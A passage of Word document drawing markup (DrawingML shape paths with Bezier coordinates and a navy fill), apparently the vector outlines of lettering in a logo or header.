                                  <a:pt x="20384" y="39865"/>
                                  <a:pt x="21501" y="44932"/>
                                  <a:pt x="23724" y="48057"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="37078" y="54777"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="37078" y="67363"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31534" y="68567"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="22873" y="68567"/>
                                  <a:pt x="15443" y="65532"/>
                                  <a:pt x="9271" y="59448"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3086" y="53378"/>
                                  <a:pt x="0" y="44907"/>
                                  <a:pt x="0" y="34036"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="22923"/>
                                  <a:pt x="3010" y="14465"/>
                                  <a:pt x="9017" y="8686"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15037" y="2895"/>
                                  <a:pt x="22632" y="0"/>
                                  <a:pt x="31826" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="132" name="Shape 132"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5364465" y="331171"/>
                            <a:ext cx="70459" cy="68567"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="70459" h="68567">
                                <a:moveTo>
                                  <a:pt x="34518" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="44843" y="0"/>
                                  <a:pt x="52514" y="1473"/>
                                  <a:pt x="57531" y="4394"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="62547" y="7315"/>
                                  <a:pt x="66002" y="11633"/>
                                  <a:pt x="67894" y="17361"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="49073" y="20383"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="48272" y="17831"/>
                                  <a:pt x="46748" y="15875"/>
                                  <a:pt x="44500" y="14515"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="42240" y="13157"/>
                                  <a:pt x="39039" y="12484"/>
                                  <a:pt x="34874" y="12484"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="29616" y="12484"/>
                                  <a:pt x="25844" y="13119"/>
                                  <a:pt x="23571" y="14401"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="22060" y="15303"/>
                                  <a:pt x="21310" y="16472"/>
                                  <a:pt x="21310" y="17920"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21310" y="19152"/>
                                  <a:pt x="21971" y="20206"/>
                                  <a:pt x="23292" y="21069"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25095" y="22225"/>
                                  <a:pt x="31305" y="23850"/>
                                  <a:pt x="41935" y="25946"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="52565" y="28042"/>
                                  <a:pt x="59995" y="30620"/>
                                  <a:pt x="64211" y="33668"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="68376" y="36754"/>
                                  <a:pt x="70459" y="41059"/>
                                  <a:pt x="70459" y="46571"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="70459" y="52591"/>
                                  <a:pt x="67564" y="57759"/>
                                  <a:pt x="61785" y="62078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56019" y="66408"/>
                                  <a:pt x="47472" y="68567"/>
                                  <a:pt x="36144" y="68567"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25870" y="68567"/>
                                  <a:pt x="17742" y="66751"/>
                                  <a:pt x="11747" y="63131"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5766" y="59499"/>
                                  <a:pt x="1841" y="54584"/>
                                  <a:pt x="0" y="48361"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="20027" y="45707"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="20879" y="49085"/>
                                  <a:pt x="22606" y="51651"/>
                                  <a:pt x="25209" y="53403"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="27813" y="55156"/>
                                  <a:pt x="31458" y="56020"/>
                                  <a:pt x="36144" y="56020"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="41313" y="56020"/>
                                  <a:pt x="45199" y="55207"/>
                                  <a:pt x="47803" y="53556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="49555" y="52400"/>
                                  <a:pt x="50431" y="50864"/>
                                  <a:pt x="50431" y="48920"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="50431" y="47599"/>
                                  <a:pt x="49949" y="46520"/>
                                  <a:pt x="49009" y="45644"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="48006" y="44831"/>
                                  <a:pt x="45783" y="44069"/>
                                  <a:pt x="42329" y="43370"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="26225" y="40272"/>
                                  <a:pt x="16027" y="37452"/>
                                  <a:pt x="11722" y="34899"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5753" y="31356"/>
                                  <a:pt x="2768" y="26441"/>
                                  <a:pt x="2768" y="20142"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2768" y="14453"/>
                                  <a:pt x="5347" y="9677"/>
                                  <a:pt x="10502" y="5817"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15672" y="1943"/>
                                  <a:pt x="23673" y="0"/>
                                  <a:pt x="34518" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="133" name="Shape 133"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5314490" y="309492"/>
                            <a:ext cx="44463" cy="90246"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="44463" h="90246">
                                <a:moveTo>
                                  <a:pt x="29185" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="29185" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42825" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42825" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29185" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29185" y="63436"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="29185" y="68796"/>
                                  <a:pt x="29312" y="71907"/>
                                  <a:pt x="29578" y="72796"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="29845" y="73685"/>
                                  <a:pt x="30430" y="74409"/>
                                  <a:pt x="31357" y="74981"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="32284" y="75565"/>
                                  <a:pt x="33401" y="75857"/>
                                  <a:pt x="34722" y="75857"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36576" y="75857"/>
                                  <a:pt x="39256" y="75299"/>
                                  <a:pt x="42748" y="74181"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="44463" y="87643"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="39815" y="89383"/>
                                  <a:pt x="34557" y="90246"/>
                                  <a:pt x="28689" y="90246"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25095" y="90246"/>
                                  <a:pt x="21844" y="89713"/>
                                  <a:pt x="18961" y="88671"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="16066" y="87618"/>
                                  <a:pt x="13957" y="86258"/>
                                  <a:pt x="12598" y="84595"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11252" y="82918"/>
                                  <a:pt x="10313" y="80671"/>
                                  <a:pt x="9792" y="77826"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9373" y="75806"/>
                                  <a:pt x="9157" y="71730"/>
                                  <a:pt x="9157" y="65596"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9157" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9157" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9157" y="10135"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29185"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34" name="Shape 134"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5033211" y="306101"/>
                            <a:ext cx="70701" cy="92151"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="70701" h="92151">
                                <a:moveTo>
                                  <a:pt x="10261" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="22199" y="0"/>
                                  <a:pt x="32804" y="2019"/>
                                  <a:pt x="42088" y="6058"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51359" y="10083"/>
                                  <a:pt x="58458" y="15824"/>
                                  <a:pt x="63360" y="23254"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="68250" y="30683"/>
                                  <a:pt x="70701" y="38811"/>
                                  <a:pt x="70701" y="47625"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="70701" y="58115"/>
                                  <a:pt x="66992" y="67614"/>
                                  <a:pt x="59550" y="76098"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="50228" y="86804"/>
                                  <a:pt x="38265" y="92151"/>
                                  <a:pt x="23685" y="92151"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="19761" y="92151"/>
                                  <a:pt x="16802" y="91554"/>
                                  <a:pt x="14808" y="90360"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="12814" y="89167"/>
                                  <a:pt x="11493" y="87414"/>
                                  <a:pt x="10833" y="85115"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="89058"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="79773"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2870" y="79121"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="4673" y="78295"/>
                                  <a:pt x="6452" y="77000"/>
                                  <a:pt x="8204" y="75222"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="10706" y="72720"/>
                                  <a:pt x="12878" y="69050"/>
                                  <a:pt x="14706" y="64236"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="16523" y="59410"/>
                                  <a:pt x="17437" y="54927"/>
                                  <a:pt x="17437" y="50774"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="17437" y="46113"/>
                                  <a:pt x="16192" y="42545"/>
                                  <a:pt x="13703" y="40056"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11214" y="37567"/>
                                  <a:pt x="8077" y="36322"/>
                                  <a:pt x="4292" y="36322"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="37881"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="25798"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2667" y="25197"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="11087" y="25197"/>
                                  <a:pt x="17323" y="28003"/>
                                  <a:pt x="21336" y="33604"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="23114" y="26746"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41872" y="26746"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31140" y="71031"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="30480" y="73825"/>
                                  <a:pt x="30150" y="75641"/>
                                  <a:pt x="30150" y="76467"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="30150" y="77495"/>
                                  <a:pt x="30416" y="78270"/>
                                  <a:pt x="30962" y="78778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="31509" y="79299"/>
                                  <a:pt x="32156" y="79553"/>
                                  <a:pt x="32918" y="79553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="35192" y="79553"/>
                                  <a:pt x="38125" y="78359"/>
                                  <a:pt x="41732" y="75971"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46558" y="72834"/>
                                  <a:pt x="50457" y="68643"/>
                                  <a:pt x="53442" y="63373"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56426" y="58102"/>
                                  <a:pt x="57924" y="52642"/>
                                  <a:pt x="57924" y="47003"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57924" y="36868"/>
                                  <a:pt x="53708" y="28397"/>
                                  <a:pt x="45276" y="21589"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36855" y="14770"/>
                                  <a:pt x="25082" y="11367"/>
                                  <a:pt x="9982" y="11367"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="13453"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2053"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="10261"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1581" name="Shape 11581"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5542176" y="380891"/>
                            <a:ext cx="19964" cy="17361"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="19964" h="17361">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="17361"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="17361"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="136" name="Shape 136"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5578079" y="358407"/>
                            <a:ext cx="33414" cy="41332"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="33414" h="41332">
                                <a:moveTo>
                                  <a:pt x="33414" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="33414" y="11368"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23863" y="14026"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="21260" y="15639"/>
                                  <a:pt x="19952" y="17672"/>
                                  <a:pt x="19952" y="20148"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="19952" y="22574"/>
                                  <a:pt x="20993" y="24669"/>
                                  <a:pt x="23076" y="26447"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25159" y="28212"/>
                                  <a:pt x="27813" y="29101"/>
                                  <a:pt x="31039" y="29101"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="33414" y="28390"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33414" y="39883"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25070" y="41332"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="17297" y="41332"/>
                                  <a:pt x="11176" y="39490"/>
                                  <a:pt x="6706" y="35833"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2235" y="32162"/>
                                  <a:pt x="0" y="27539"/>
                                  <a:pt x="0" y="21938"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="18230"/>
                                  <a:pt x="1016" y="14928"/>
                                  <a:pt x="3048" y="12020"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5080" y="9124"/>
                                  <a:pt x="7938" y="6890"/>
                                  <a:pt x="11608" y="5352"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15278" y="3803"/>
                                  <a:pt x="20574" y="2457"/>
                                  <a:pt x="27483" y="1301"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="33414"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37" name="Shape 137"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5580136" y="331441"/>
                            <a:ext cx="31356" cy="21231"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="31356" h="21231">
                                <a:moveTo>
                                  <a:pt x="31356" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="31356" y="13037"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31242" y="13015"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="27698" y="13015"/>
                                  <a:pt x="24930" y="13624"/>
                                  <a:pt x="22936" y="14843"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20955" y="16049"/>
                                  <a:pt x="19342" y="18183"/>
                                  <a:pt x="18110" y="21231"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="18386"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2032" y="12049"/>
                                  <a:pt x="5537" y="7350"/>
                                  <a:pt x="10503" y="4302"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="31356"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38" name="Shape 138"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5484867" y="307701"/>
                            <a:ext cx="36583" cy="90833"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="36583" h="90833">
                                <a:moveTo>
                                  <a:pt x="16618" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="36583" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="36583" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18040" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18040" y="80911"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="14967" y="84658"/>
                                  <a:pt x="11335" y="87452"/>
                                  <a:pt x="7144" y="89281"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="90833"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="78247"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="146" y="78321"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="4731" y="78321"/>
                                  <a:pt x="8642" y="76619"/>
                                  <a:pt x="11855" y="73228"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15081" y="69824"/>
                                  <a:pt x="16694" y="64757"/>
                                  <a:pt x="16694" y="58001"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="16694" y="50470"/>
                                  <a:pt x="15132" y="45047"/>
                                  <a:pt x="12008" y="41732"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="36757"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="25665"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16618" y="32614"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16618"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1582" name="Shape 11582"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5744868" y="380891"/>
                            <a:ext cx="19964" cy="17361"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="19964" h="17361">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="17361"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="17361"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="140" name="Shape 140"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5784073" y="332657"/>
                            <a:ext cx="68606" cy="67081"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="68606" h="67081">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19951" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19951" y="30137"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="19951" y="39370"/>
                                  <a:pt x="20320" y="45021"/>
                                  <a:pt x="21057" y="47091"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21793" y="49175"/>
                                  <a:pt x="23126" y="50826"/>
                                  <a:pt x="25070" y="52044"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="27013" y="53251"/>
                                  <a:pt x="29476" y="53860"/>
                                  <a:pt x="32461" y="53860"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="35865" y="53860"/>
                                  <a:pt x="38926" y="53047"/>
                                  <a:pt x="41618" y="51422"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="44323" y="49796"/>
                                  <a:pt x="46165" y="47777"/>
                                  <a:pt x="47155" y="45364"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="48158" y="42964"/>
                                  <a:pt x="48654" y="37058"/>
                                  <a:pt x="48654" y="27674"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="48654" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="68606" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="68606" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50076" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50076" y="55778"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="47320" y="59271"/>
                                  <a:pt x="43714" y="62039"/>
                                  <a:pt x="39243" y="64046"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="34760" y="66065"/>
                                  <a:pt x="30048" y="67081"/>
                                  <a:pt x="25070" y="67081"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20003" y="67081"/>
                                  <a:pt x="15456" y="66116"/>
                                  <a:pt x="11430" y="64173"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="7404" y="62242"/>
                                  <a:pt x="4496" y="59524"/>
                                  <a:pt x="2692" y="56019"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="901" y="52527"/>
                                  <a:pt x="0" y="47688"/>
                                  <a:pt x="0" y="41504"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="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41" name="Shape 141"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5659702" y="331171"/>
                            <a:ext cx="71171" cy="68567"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="71171" h="68567">
                                <a:moveTo>
                                  <a:pt x="36576" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="45758" y="0"/>
                                  <a:pt x="53061" y="1727"/>
                                  <a:pt x="58484" y="5169"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="63907" y="8598"/>
                                  <a:pt x="67806" y="13843"/>
                                  <a:pt x="70167" y="20879"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="50495" y="23964"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="49835" y="20548"/>
                                  <a:pt x="48336" y="17983"/>
                                  <a:pt x="45987" y="16256"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43637" y="14515"/>
                                  <a:pt x="40602" y="13652"/>
                                  <a:pt x="36856" y="13652"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="31890" y="13652"/>
                                  <a:pt x="27927" y="15151"/>
                                  <a:pt x="24955" y="18135"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21997" y="21120"/>
                                  <a:pt x="20523" y="26111"/>
                                  <a:pt x="20523" y="33109"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20523" y="40894"/>
                                  <a:pt x="22022" y="46393"/>
                                  <a:pt x="25032" y="49606"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="28042" y="52819"/>
                                  <a:pt x="32080" y="54419"/>
